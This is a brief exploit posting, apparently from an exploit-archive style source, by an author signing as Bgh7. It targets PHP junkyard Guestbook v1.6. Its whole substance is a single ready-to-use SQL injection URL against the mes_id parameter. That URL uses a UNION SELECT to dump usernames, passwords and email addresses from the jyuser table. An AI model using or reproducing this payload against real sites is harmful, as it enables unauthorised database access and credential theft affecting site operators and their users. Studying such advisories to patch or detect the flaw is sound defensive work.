##PHP junkyard Guestbook v1.6 (mes_id) Sql Injection Vuln.
##Yazar: Bgh7
##
##Turk Bilisim Gucleri / Ihlilal Hatti
##
##ByBgh7[a]Msn.Com
##
##Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##

Sql: site/guestbook.php?mes_id=-99999 UNION SELECT 0,1,2,concat_ws(user,0x3a,pass,0x3a,mail),4,5,6,7,8,9,10,11,12 FROM jyuser--